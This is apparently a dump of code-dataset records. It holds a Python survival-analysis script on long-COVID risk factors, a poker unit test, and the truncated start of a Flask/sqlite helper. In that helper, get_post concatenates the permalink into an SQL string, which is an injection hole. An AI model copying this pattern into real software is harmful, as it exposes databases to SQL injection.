25-<30 overweight ',\n 'BMI: >=30 obese ', 'BMI: missing']\n\n col_names += ['Smoker: never', 'Smoker: current', 'Smoker: former', 'Smoker: missing']\n\n col_names += ['03/20-06/20', '07/20-10/20', '11/20-02/21', '03/21-06/21', '07/21-11/21']\n\n col_names += ['num_Comorbidity=0', 'num_Comorbidity=1', 'num_Comorbidity=2', 'num_Comorbidity=3',\n 'num_Comorbidity=4', 'num_Comorbidity>=5']\n\n if args.encode == 'icd_med':\n col_names += list(df.columns)[df.columns.get_loc('death t2e') + 1:df.columns.get_loc('label')]\n else:\n col_names += 
[\"DX: Alcohol Abuse\", \"DX: Anemia\", \"DX: Arrythmia\", \"DX: Asthma\", \"DX: Cancer\",\n \"DX: Chronic Kidney Disease\", \"DX: Chronic Pulmonary Disorders\", \"DX: Cirrhosis\",\n \"DX: Coagulopathy\", \"DX: Congestive Heart Failure\",\n \"DX: COPD\", \"DX: Coronary Artery Disease\", \"DX: Dementia\", \"DX: Diabetes Type 1\",\n \"DX: Diabetes Type 2\", \"DX: End Stage Renal Disease on Dialysis\", \"DX: Hemiplegia\",\n \"DX: HIV\", \"DX: Hypertension\", \"DX: Hypertension and Type 1 or 2 Diabetes Diagnosis\",\n \"DX: Inflammatory Bowel Disorder\", \"DX: Lupus or Systemic Lupus Erythematosus\",\n \"DX: Mental Health Disorders\", \"DX: Multiple Sclerosis\", \"DX: Parkinson's Disease\",\n \"DX: Peripheral vascular disorders \", \"DX: Pregnant\",\n \"DX: Pulmonary Circulation Disorder (PULMCR_ELIX)\",\n \"DX: Rheumatoid Arthritis\", \"DX: Seizure/Epilepsy\",\n \"DX: Severe Obesity (BMI>=40 kg/m2)\", \"DX: Weight Loss\",\n \"DX: Down's Syndrome\", 'DX: Other Substance Abuse', 'DX: Cystic Fibrosis',\n 'DX: Autism', 'DX: Sickle Cell'\n ]\n\n col_names += [\"MEDICATION: Corticosteroids\", \"MEDICATION: Immunosuppressant drug\"]\n\n print('encoding:', args.encode, 'len(col_names):', len(col_names))\n print(col_names)\n return col_names\n\n\ndef pre_transform_feature(df):\n # col_names = ['ADI1-9', 'ADI10-19', 'ADI20-29', 'ADI30-39', 'ADI40-49', 'ADI50-59', 'ADI60-69', 'ADI70-79',\n # 'ADI80-89', 'ADI90-100']\n df['ADI1-19'] = (df['ADI1-9'] + df['ADI10-19'] >= 1).astype('int')\n df['ADI20-39'] = (df['ADI20-29'] + df['ADI30-39'] >= 1).astype('int')\n df['ADI40-59'] = (df['ADI40-49'] + df['ADI50-59'] >= 1).astype('int')\n df['ADI60-79'] = (df['ADI60-69'] + df['ADI70-79'] >= 1).astype('int')\n df['ADI80-100'] = (df['ADI80-89'] + df['ADI90-100'] >= 1).astype('int')\n\n df['75+ years'] = (df['75-<85 years'] + df['85+ years'] >= 1).astype('int')\n\n df['inpatient visits 1-4'] = (df['inpatient visits 1-2'] + df['inpatient visits 3-4'] >= 1).astype('int')\n df['outpatient visits 1-4'] = (df['outpatient visits 1-2'] + df['outpatient visits 3-4'] >= 1).astype('int')\n df['emergency visits 1-4'] = (df['emergency visits 1-2'] + df['emergency visits 3-4'] >= 1).astype('int')\n\n df['not hospitalized'] = 1 - df['hospitalized']\n df['icu'] = ((df['ventilation'] + df['criticalcare']) >= 1).astype('int')\n\n return df\n\n\ndef risk_factor_of_any_pasc(args, df, df_pasc_info, pasc_threshold=1, dump=True):\n print('in risk_factor_of_any_pasc, PASC is defined by >=', pasc_threshold)\n\n print('df.shape:', df.shape)\n df = pre_transform_feature(df)\n print('df.shape after pre_transform_feature:', df.shape)\n covs_columns = collect_feature_columns_4_risk_analysis(args, df)\n\n pasc_flag = (df['pasc-count'] >= pasc_threshold).astype('int')\n pasc_t2e = df['pasc-min-t2e'] # this time 2 event can only be used for >= 1 pasc. 
If >= 2, how to define t2e?\n    print('pos:{} ({:.3%})'.format(pasc_flag.sum(), pasc_flag.mean()),\n          'neg:{} ({:.3%})'.format((1 - pasc_flag).sum(), (1 - pasc_flag).mean()))\n    # 1 pasc --> the earliest; 2 pasc --> 2nd earliest, etc.\n    if pasc_threshold >= 2:\n        print('pasc threshold >=', pasc_threshold, 't2e is defined as the ', pasc_threshold, 'th earliest event time')\n        df['pasc-min-t2e'] = 180\n        specific_pasc_col = [x for x in df.columns if x.startswith('flag@')]\n        for index, rows in tqdm(df.iterrows(), total=df.shape[0]):\n            npasc = rows['pasc-count']\n            if npasc >= pasc_threshold:\n                # if at least pasc_threshold pasc occur, t2e is the pasc_threshold-th earliest time\n                pasc_flag_cols = list(rows[specific_pasc_col][rows[specific_pasc_col] > 0].index)\n                pasc_t2e_cols = [x.replace('flag@', 'dx-t2e@') for x in pasc_flag_cols]\n                # t2e = rows[pasc_t2e_cols].min()\n                time_vec = sorted(rows[pasc_t2e_cols])\n                t2e = time_vec[min(len(time_vec) - 1, pasc_threshold - 1)]\n            else:\n                # if fewer than pasc_threshold events occur, e.g. pasc_threshold=2 but only 1 event happened,\n                # then the 2-event pasc did not happen\n                # t2e is the event, death, censoring, 180 days, whichever came first.\n                # t2e = rows.loc[[x.replace('flag@', 'dx-t2e@') for x in specific_pasc_col]].max()\n                t2e = max(30, np.min([rows['death t2e'], rows['maxfollowup'], 180]))\n\n            df.loc[index, 'pasc-min-t2e'] = t2e\n\n    # support >= 2,3,4... by updating pasc-min-t2e definition.\n    # pasc_name = 'Heart failure'\n    # pasc_flag = df['flag@'+pasc_name]\n    # pasc_t2e = df['dx-t2e@'+pasc_name]\n\n    cox_data = df.loc[:, covs_columns]\n    print('cox_data.shape before number filter:', cox_data.shape)\n    cox_data = cox_data.loc[:, cox_data.columns[(cox_data.mean() >= 0.001) & (cox_data.mean() < 1)]]\n    print('cox_data.shape after number filter:', cox_data.shape)\n\n    model = ml.CoxPrediction(random_seed=args.random_seed, ).cross_validation_fit(\n        cox_data, pasc_t2e, pasc_flag, kfold=KFOLD, scoring_method=\"concordance_index\")\n    # paras_grid={'l1_ratio': [0], 'penalizer': [0.1]}\n\n    model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[], pre='uni-')\n    model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n        '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years'], pre='age-')\n    if args.severity == 'all':\n        model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n            '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n            'not hospitalized', 'hospitalized', 'icu'], pre='ageAcute-')\n    model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n        '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n        'not hospitalized', 'hospitalized', 'icu', 'Female', 'Male', ], pre='ageAcuteSex-')\n\n    if dump:\n        utils.check_and_mkdir(args.out_dir + 'any_pasc/')\n        model.risk_results.reset_index().sort_values(by=['HR'], ascending=False).to_csv(\n            args.out_dir + 'any_pasc/any-at-least-{}-pasc-riskFactor-{}-{}-{}.csv'.format(\n                pasc_threshold, args.dataset, args.population, args.severity))\n        model.results.sort_values(by=['E[fit]'], ascending=False).to_csv(\n            args.out_dir + 'any_pasc/any-at-least-{}-pasc-modeSelection-{}-{}-{}.csv'.format(\n                pasc_threshold, args.dataset, args.population, args.severity))\n\n    return model\n\n\ndef risk_factor_of_any_organ(args, df, df_pasc_info, organ_threshold=1, dump=True):\n    print('Organ is defined by >=', organ_threshold)\n\n    print('df.shape:', df.shape)\n    df = pre_transform_feature(df)\n    print('df.shape after pre_transform_feature:', 
df.shape)\n covs_columns = collect_feature_columns_4_risk_analysis(args, df)\n\n pasc_flag = (df['organ-count'] >= organ_threshold).astype('int')\n print('pos:{} ({:.3%})'.format(pasc_flag.sum(), pasc_flag.mean()),\n 'neg:{} ({:.3%})'.format((1 - pasc_flag).sum(), (1 - pasc_flag).mean()))\n\n pasc_t2e = df['organ-min-t2e']\n # 1 pasc --> the earliest; 2 pasc --> 2nd earliest, et.c\n if organ_threshold >= 2:\n print('organ_threshold >=', organ_threshold, 't2e is defined as the ', organ_threshold,\n 'th earliest events time')\n df['organ-min-t2e'] = 180\n specific_organ_col = [x for x in df.columns if x.startswith('organ-flag@')]\n for index, rows in tqdm(df.iterrows(), total=df.shape[0]):\n norgan = rows['organ-count']\n if norgan >= organ_threshold:\n organ_flag_cols = list(rows[specific_organ_col][rows[specific_organ_col] > 0].index)\n organ_t2e_cols = [x.replace('organ-flag@', 'organ-t2e@') for x in organ_flag_cols]\n # t2e = rows[organ_t2e_cols].min()\n time_vec = sorted(rows[organ_t2e_cols])\n t2e = time_vec[min(len(time_vec) - 1, organ_threshold - 1)]\n else:\n t2e = max(30, np.min([rows['death t2e'], rows['maxfollowup'], 180]))\n\n df.loc[index, 'organ-min-t2e'] = t2e\n\n # support >= 2,3,4... by updating pasc-min-t2e definition.\n cox_data = df.loc[:, covs_columns]\n print('cox_data.shape before number filter:', cox_data.shape)\n cox_data = cox_data.loc[:, cox_data.columns[(cox_data.mean() >= 0.001) & (cox_data.mean() < 1)]]\n print('cox_data.shape after number filter:', cox_data.shape)\n\n model = ml.CoxPrediction(random_seed=args.random_seed, ).cross_validation_fit(\n cox_data, pasc_t2e, pasc_flag, kfold=KFOLD, scoring_method=\"concordance_index\")\n\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[], pre='uni-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years'], pre='age-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu'], pre='ageAcute-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu', 'Female', 'Male', ], pre='ageAcuteSex-')\n if dump:\n utils.check_and_mkdir(args.out_dir + 'any_organ/')\n model.risk_results.reset_index().sort_values(by=['HR'], ascending=False).to_csv(\n args.out_dir + 'any_organ/any-at-least-{}-ORGAN-riskFactor-{}-{}-{}.csv'.format(organ_threshold,\n args.dataset,\n args.population,\n args.severity))\n model.results.sort_values(by=['E[fit]'], ascending=False).to_csv(\n args.out_dir + 'any_organ/any-at-least-{}-ORGAN-modeSelection-{}-{}-{}.csv'.format(organ_threshold,\n args.dataset,\n args.population,\n args.severity))\n\n return model\n\n\ndef screen_any_pasc(args, df, df_pasc_info):\n print('In screen_any_pasc, args: ', args)\n print('random_seed: ', args.random_seed)\n model_dict = {}\n for i in range(1, 9):\n print('screen_any_pasc, In threshold:', i)\n model = risk_factor_of_any_pasc(args, df, df_pasc_info, pasc_threshold=i, dump=True)\n model_dict[i] = model\n\n return model_dict\n\n\ndef screen_any_organ(args, df, df_pasc_info):\n print('In screen_any_organ, args: ', args)\n print('random_seed: ', args.random_seed)\n model_dict = {}\n for i in range(1, 9):\n print('screen_any_pasc, In threshold:', i)\n model = risk_factor_of_any_organ(args, df, 
df_pasc_info, organ_threshold=i, dump=True)\n model_dict[i] = model\n\n return model_dict\n\n\ndef screen_all_organ(args, df, df_pasc_info, selected_organ_list, dump=True):\n print('In screen_all_organ, args: ', args)\n print('random_seed: ', args.random_seed)\n print('df.shape:', df.shape)\n df = pre_transform_feature(df)\n print('df.shape after pre_transform_feature:', df.shape)\n covs_columns = collect_feature_columns_4_risk_analysis(args, df)\n\n # build flag, t2e for each organ\n print('Screening All Organ category')\n i = 0\n model_dict = {}\n for organ in tqdm(selected_organ_list, total=len(selected_organ_list)):\n i += 1\n print(i, 'screening:', organ)\n pasc_flag = df['organ-flag@' + organ]\n pasc_t2e = df['organ-t2e@' + organ]\n print('pos:{} ({:.3%})'.format(pasc_flag.sum(), pasc_flag.mean()),\n 'neg:{} ({:.3%})'.format((1 - pasc_flag).sum(), (1 - pasc_flag).mean()))\n\n cox_data = df.loc[:, covs_columns]\n print('cox_data.shape before number filter:', cox_data.shape)\n cox_data = cox_data.loc[:, cox_data.columns[(cox_data.mean() >= 0.001) & (cox_data.mean() < 1)]]\n print('cox_data.shape after number filter:', cox_data.shape)\n\n model = ml.CoxPrediction(random_seed=args.random_seed, ).cross_validation_fit(\n cox_data, pasc_t2e, pasc_flag, kfold=KFOLD, scoring_method=\"concordance_index\")\n\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[], pre='uni-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years'], pre='age-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu'], pre='ageAcute-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu', 'Female', 'Male', ], pre='ageAcuteSex-')\n if dump:\n utils.check_and_mkdir(args.out_dir + 'every_organ/')\n model.risk_results.reset_index().sort_values(by=['HR'], ascending=False).to_csv(\n args.out_dir + 'every_organ/ORGAN-{}-riskFactor-{}-{}-{}.csv'.format(\n organ, args.dataset, args.population, args.severity))\n model.results.sort_values(by=['E[fit]'], ascending=False).to_csv(\n args.out_dir + 'every_organ/ORGAN-{}-modeSelection-{}-{}-{}.csv'.format(\n organ, args.dataset, args.population, args.severity))\n print('Dump done', organ)\n\n model_dict[organ] = model\n\n return model_dict\n\n\ndef screen_all_pasc(args, df, df_pasc_info, selected_pasc_list, dump=True):\n print('In screen_all_pasc, args: ', args)\n print('random_seed: ', args.random_seed)\n print('df.shape:', df.shape)\n df = pre_transform_feature(df)\n print('df.shape after pre_transform_feature:', df.shape)\n covs_columns = collect_feature_columns_4_risk_analysis(args, df)\n\n # build flag, t2e for each organ\n print('Screening All PASC category')\n i = 0\n model_dict = {}\n for pasc in tqdm(selected_pasc_list, total=len(selected_pasc_list)):\n i += 1\n print(i, 'screening:', pasc)\n pasc_flag = df['flag@' + pasc]\n pasc_t2e = df['dx-t2e@' + pasc]\n\n print('pos:{} ({:.3%})'.format(pasc_flag.sum(), pasc_flag.mean()),\n 'neg:{} ({:.3%})'.format((1 - pasc_flag).sum(), (1 - pasc_flag).mean()))\n\n cox_data = df.loc[:, covs_columns]\n print('cox_data.shape before number filter:', cox_data.shape)\n cox_data = cox_data.loc[:, cox_data.columns[(cox_data.mean() >= 0.001) & 
(cox_data.mean() < 1)]]\n print('cox_data.shape after number filter:', cox_data.shape)\n\n model = ml.CoxPrediction(random_seed=args.random_seed, ).cross_validation_fit(\n cox_data, pasc_t2e, pasc_flag, kfold=KFOLD, scoring_method=\"concordance_index\")\n\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[], pre='uni-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years'], pre='age-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu'], pre='ageAcute-')\n model.uni_variate_risk(cox_data, pasc_t2e, pasc_flag, adjusted_col=[\n '20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years',\n 'not hospitalized', 'hospitalized', 'icu', 'Female', 'Male', ], pre='ageAcuteSex-')\n if dump:\n utils.check_and_mkdir(args.out_dir + 'every_pasc/')\n model.risk_results.reset_index().sort_values(by=['HR'], ascending=False).to_csv(\n args.out_dir + 'every_pasc/PASC-{}-riskFactor-{}-{}-{}.csv'.format(\n pasc.replace('/', '_'), args.dataset, args.population, args.severity))\n model.results.sort_values(by=['E[fit]'], ascending=False).to_csv(\n args.out_dir + 'every_pasc/PASC-{}-modeSelection-{}-{}-{}.csv'.format(\n pasc.replace('/', '_'), args.dataset, args.population, args.severity))\n print('Dump done', pasc)\n\n model_dict[pasc] = model\n\n return model_dict\n\n\ndef combination_of_pasc():\n # specific_pasc_col = [x for x in df.columns if x.startswith('flag@')]\n # pasc_name = {}\n # for index, row in df_pasc_info.iterrows():\n # pasc_name['flag@' + row['pasc']] = row['PASC Name Simple']\n #\n # pasc_data = df.loc[(df['covid'] == 1) & (df['pasc-count'] >= 1), specific_pasc_col].rename(columns=pasc_name)\n\n # # te = TransactionEncoder()\n # # te_ary = te.fit(pasc_data).transform(pasc_data)\n # freitem = apriori(pasc_data, min_support=0.001, use_colnames=True, low_memory=True)\n # freitem['length'] = freitem['itemsets'].apply(lambda x: len(x))\n # freitem['itemsets'] = freitem['itemsets'].apply(lambda x: '; '.join(list(x)))\n # freitem['Occurrence'] = freitem['support'] * len(pasc_data)\n # freitem['Crude Incidence'] = freitem['support'] * len(pasc_data) / len(df.loc[df['covid'] == 1, :])\n # freitem.to_csv(args.out_dir + 'frequent_pasc-covid-positive.csv')\n\n # pasc_data = df.loc[(df['covid'] == 0) & (df['pasc-count'] >= 1), specific_pasc_col].rename(columns=pasc_name)\n # # te = TransactionEncoder()\n # # te_ary = te.fit(pasc_data).transform(pasc_data)\n # freitem2 = apriori(pasc_data, min_support=0.0001, use_colnames=True, low_memory=True)\n # freitem2['length'] = freitem2['itemsets'].apply(lambda x: len(x))\n # freitem2['itemsets'] = freitem2['itemsets'].apply(lambda x: '; '.join(list(x)))\n # freitem2['Occurrence'] = freitem2['support'] * len(pasc_data)\n # freitem2['Crude Incidence'] = freitem2['support'] * len(pasc_data) / len(df.loc[df['covid'] == 0, :])\n # freitem2.to_csv(args.out_dir + 'frequent_pasc-covid-negative.csv')\n #\n # freitem_combined = pd.merge(freitem, freitem2, left_on='itemsets', right_on='itemsets', how='left')\n # freitem_combined.to_csv(args.out_dir + 'frequent_pasc-combined.csv')\n #\n # print(\"done!\")\n # print('Done! 
Total Time used:', time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start_time)))\n # sys.exit(0)\n pass\n\n\n# def plot_cumulative_incidence():\n\n\nif __name__ == '__main__':\n # python screen_risk_factors.py --dataset INSIGHT --encode elix 2>&1 | tee log/screen_anyPASC-risk_factors-insight-elix.txt\n # python screen_risk_factors.py --dataset OneFlorida --encode elix 2>&1 | tee log/screen_anyPASC-risk_factors-OneFlorida-elix.txt\n\n start_time = time.time()\n args = parse_args()\n\n np.random.seed(args.random_seed)\n random.seed(args.random_seed)\n\n print('args: ', args)\n print('random_seed: ', args.random_seed)\n\n # -Pre step1: select Covid Positive data and dump\n # read_all_and_dump_covid_positive(r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL.csv')\n # read_all_and_dump_covid_positive(r'../data/oneflorida/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_all.csv')\n\n # -Pre step2: build Covid Positive data and dump for future use\n # df, df_pasc_info = build_incident_pasc_from_all_positive(args)\n\n # sys.exit(0)\n\n # Step 1: Load pre-processed data for screening. May dynamically fine tune feature\n print('Load data file:', args.processed_data_file)\n # args.processed_data_file = r'../data/V15_COVID19/output/character/matrix_cohorts_covid_4manuNegNoCovidV2_bool_ALL-ANYPASC.csv'\n df = pd.read_csv(args.processed_data_file, dtype={'patid': str, 'site': str, 'zip': str},\n parse_dates=['index date'])\n print('Load done, df.shape:', df.shape)\n print('Covid Positives:', (df['covid'] == 1).sum(), (df['covid'] == 1).mean())\n print('Covid Negative:', (df['covid'] == 0).sum(), (df['covid'] == 0).mean())\n\n # Step 2: Load pasc meta information\n df_pasc_info = pd.read_excel('output/causal_effects_specific_withMedication_v3.xlsx', sheet_name='diagnosis')\n selected_pasc_list = df_pasc_info.loc[df_pasc_info['selected'] == 1, 'pasc']\n print('len(selected_pasc_list)', len(selected_pasc_list))\n print(selected_pasc_list)\n selected_organ_list = df_pasc_info.loc[df_pasc_info['selected'] == 1, 'Organ Domain'].unique()\n print('len(selected_organ_list)', len(selected_organ_list))\n\n specific_pasc_col = [x for x in df.columns if x.startswith('flag@')]\n pasc_name = {}\n for index, row in df_pasc_info.iterrows():\n pasc_name['flag@' + row['pasc']] = row['PASC Name Simple']\n\n pasc_data = df.loc[(df['covid'] == 1) & (df['pasc-count'] >= 1), specific_pasc_col].rename(columns=pasc_name)\n\n # Step 3: set Covid pos, neg, or all population\n if args.population == 'positive':\n print('Using Covid positive cohorts')\n df = df.loc[(df['covid'] == 1), :].copy()\n elif args.population == 'negative':\n print('Using Covid negative cohorts')\n df = df.loc[(df['covid'] == 0), :].copy()\n else:\n print('Using Both Covid Positive and Negative cohorts')\n\n print('Select population:', args.population, 'df.shape:', df.shape)\n\n # Step 4: set sub- population\n # focusing on: all, outpatient, inpatienticu (namely inpatient in a broad sense)\n # 'all', 'outpatient', 'inpatient', 'critical', 'ventilation' can add more later, just these 4 for brevity\n if args.severity == 'outpatient':\n print('Considering outpatient cohorts')\n df = df.loc[(df['hospitalized'] == 0) & (df['criticalcare'] == 0), :].copy()\n elif (args.severity == 'inpatienticu') or (args.severity == 'nonoutpatient'):\n print('Considering inpatient/hospitalized including icu cohorts, namely non-outpatient')\n df = df.loc[(df['hospitalized'] == 1) | (df['criticalcare'] == 1), :].copy()\n elif 
args.severity == 'inpatient':\n        print('Considering inpatient/hospitalized cohorts but not ICU')\n        df = df.loc[(df['hospitalized'] == 1) & (df['ventilation'] == 0) & (df['criticalcare'] == 0), :].copy()\n    elif args.severity == 'icu':\n        print('Considering ICU (hospitalized ventilation or critical care) cohorts')\n        df = df.loc[(((df['hospitalized'] == 1) & (df['ventilation'] == 1)) | (df['criticalcare'] == 1)), :].copy()\n    elif args.severity == 'ventilation':\n        print('Considering (hospitalized) ventilation cohorts')\n        df = df.loc[(df['hospitalized'] == 1) & (df['ventilation'] == 1), :].copy()\n    else:\n        print('Considering ALL cohorts')\n\n    print('Select sub- cohorts:', args.severity, 'df.shape:', df.shape)\n\n    print('df.shape:', df.shape)\n    df = pre_transform_feature(df)\n    print('df.shape after pre_transform_feature:', df.shape)\n    covs_columns = collect_feature_columns_4_risk_analysis(args, df)\n\n    pasc_flag = (df['pasc-count'] >= 1).astype('int')\n    pasc_t2e = df.loc[pasc_flag==1, 'pasc-min-t2e']  # this time 2 event can only be used for >= 1 pasc. If >= 2, how to define t2e?\n    print('PASC pos:{} ({:.3%})'.format(pasc_flag.sum(), pasc_flag.mean()),\n          'PASC neg:{} ({:.3%})'.format((1 - pasc_flag).sum(), (1 - pasc_flag).mean()))\n    print('PASC t2e quantile:', np.quantile(pasc_t2e, [0.5, 0.25, 0.75]))\n\n    severe_pasc_flag = df['pasc-severe-flag']\n    severe_pasc_t2e = df.loc[df['pasc-severe-flag']==1, 'pasc-severe-min-t2e']\n    print('Severe PASC pos:{} ({:.3%})'.format(severe_pasc_flag.sum(), severe_pasc_flag.sum()/pasc_flag.sum()))\n    print('Severe PASC t2e quantile:', np.quantile(severe_pasc_t2e, [0.5, 0.25, 0.75]))\n\n    moderate_pasc_flag = df['pasc-moderateonly-flag']\n    moderate_pasc_t2e = df.loc[df['pasc-moderateonly-flag'] == 1, 'pasc-moderate-min-t2e']\n    print('Moderate PASC pos:{} ({:.3%})'.format(moderate_pasc_flag.sum(), moderate_pasc_flag.sum() / pasc_flag.sum()))\n    print('Moderate PASC t2e quantile:', np.quantile(moderate_pasc_t2e, [0.5, 0.25, 0.75]))\n\n    # plot cumulative incidence across age\n    age_cols = ['20-<40 years', '40-<55 years', '55-<65 years', '65-<75 years', '75+ years']\n    col_name = ['20-39', '40-54', '55-64', '65-74', '75+']\n    legend_title = \"Age group\"\n    # NOTE: the block below overrides the age grouping above; comment it out to plot by age group instead\n    age_cols = ['Female', 'Male']\n    col_name = ['Female', 'Male']\n    legend_title = \"Gender\"\n\n    line_type = ['-', '-.', ':', '--', 'dotted', ]\n    ajs = []\n    for i, col in enumerate(age_cols):\n        t2e = df.loc[df[col] == 1, 'pasc-min-t2e']\n        flag = df.loc[df[col] == 1, 'pasc-flag']\n        aj = AalenJohansenFitter(calculate_variance=True).fit(t2e, flag, event_of_interest=1, label=col_name[i])\n        ajs.append(aj)\n\n    f = plt.figure(figsize=(8, 5))\n    ax = f.add_subplot(111)\n    # ax = brokenaxes(ylims=((0, .7), (.7, 1)), hspace=.05)\n    plt.axhline(y=0.5, color='0.85', linestyle='--')\n    plt.axhline(y=0.6, color='0.85', linestyle='--')\n    plt.axhline(y=0.7, color='0.85', linestyle='--')\n    plt.axhline(y=0.8, color='0.85', linestyle='--')\n    # ajf1.plot(ax=ax)\n    for i, aj in enumerate(ajs):\n        aj.plot(ax=ax, loc=slice(0., t2e.max()), linestyle=line_type[i])  # 0, 180\n\n    # add_at_risk_counts(ajf1w, ajf0w, ax=ax)\n    plt.xlim([0, 180])\n    plt.ylim([0, 0.85])\n\n    ax.spines['top'].set_visible(False)\n    ax.spines['right'].set_visible(False)\n    ax.spines['bottom'].set_visible(True)\n    ax.spines['left'].set_visible(True)\n    legend = plt.legend(title=legend_title, fontsize=15, loc='upper left')\n    legend.get_title().set_fontsize('15')  # legend 'Title' fontsize\n    # ax.grid(axis='y')\n\n    plt.xticks(fontsize=12)\n    plt.yticks(fontsize=12)\n    ax.set_xlabel(\"Days\", 
fontsize=15)\n ax.set_ylabel(\"Cumulative Incidence\", fontsize=15)\n plt.tight_layout()\n\n utils.check_and_mkdir(args.fig_out_dir)\n plt.savefig(args.fig_out_dir + 'cumincidence_{}_{}.png'.format(legend_title, args.severity, ),\n bbox_inches='tight',\n dpi=600)\n plt.savefig(args.fig_out_dir + 'cumincidence_{}_{}.pdf'.format(legend_title, args.severity, ),\n bbox_inches='tight',\n transparent=True)\n\n plt.show()\n # plt.ylim([0, ajf0w.cumulative_density_.loc[180][0] * 3])\n\n # plt.title('title', fontsize=12)\n # plt.savefig(fig_outfile.replace('-km.png', '-cumIncidence.png'))\n # plt.close()\n\n # plot cumulative incidence across severity\n\n # ['anypasc', 'allpasc', 'anyorgan', 'allorgan']\n print(args.goal)\n # if args.goal == 'anypasc':\n # # screening risk factor of >= k PASC\n # screen_any_pasc(args, df, df_pasc_info)\n # elif args.goal == 'anyorgan':\n # screen_any_organ(args, df, df_pasc_info)\n # elif args.goal == 'allpasc':\n # screen_all_pasc(args, df, df_pasc_info, selected_pasc_list, dump=True)\n # elif args.goal == 'allorgan':\n # screen_all_organ(args, df, df_pasc_info, selected_organ_list, dump=True)\n\n print('Done! Total Time used:', time.strftime(\"%H:%M:%S\", time.gmtime(time.time() - start_time)))\n","sub_path":"prediction/risk_cumulative_incidence.py","file_name":"risk_cumulative_incidence.py","file_ext":"py","file_size_in_byte":44374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"450527681","text":"import unittest\nfrom poker.validators import PairValidator\nfrom poker.card import Card\n\nclass TestPairValidator(unittest.TestCase):\n\n def test_valid_rank_is_pair(self):\n cards = [\n Card(rank = \"5\", suite = \"hearts\"),\n Card(rank = \"7\", suite = \"spades\"),\n Card(rank = \"9\", suite = \"clubs\"),\n Card(rank = \"9\", suite = \"diamonds\"),\n Card(rank = \"King\", suite = \"hearts\")\n ]\n pair = PairValidator(cards = cards)\n\n self.assertEqual(\n pair.is_valid(),\n True \n )\n \n def test_valid_cards_making_a_pair(self):\n \n nine_diamonds = Card(rank = \"9\", suite = \"diamonds\")\n nine_clubs = Card(rank = \"9\", suite = \"clubs\")\n\n cards = [\n Card(rank = \"5\", suite = \"hearts\"),\n Card(rank = \"7\", suite = \"spades\"),\n nine_diamonds,\n nine_clubs,\n Card(rank = \"King\", suite = \"hearts\")\n ]\n cards.sort()\n pair = PairValidator(cards = cards)\n\n self.assertEqual(\n pair.valid_cards(),\n [nine_clubs,nine_diamonds]\n )\n","sub_path":"test/test_validators/test_pair_validator.py","file_name":"test_pair_validator.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"650563497","text":"import sqlite3\nfrom flask import g\n\nDATABASE = 'db/tru.db'\n\n\ndef connect_db():\n return sqlite3.connect('db/tru.db')\n\n\ndef get_db():\n db = getattr(g, '_database', None)\n if db is None:\n db = g._database = connect_db()\n return db\n\n\ndef init_db(app):\n with app.app_context():\n db = get_db()\n with app.open_resource('db/schema.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\ndef insert_examples(app):\n with app.app_context():\n db = get_db()\n with app.open_resource('db/exampleEntries.sql', mode='r') as f:\n db.cursor().executescript(f.read())\n db.commit()\n\n\ndef get_posts():\n return query_db(\"SELECT * FROM post ORDER BY post.created_at DESC\")\n\n\ndef get_post(permalink):\n result = query_db(\"SELECT * FROM post WHERE post.permalink='\" + permalink + 
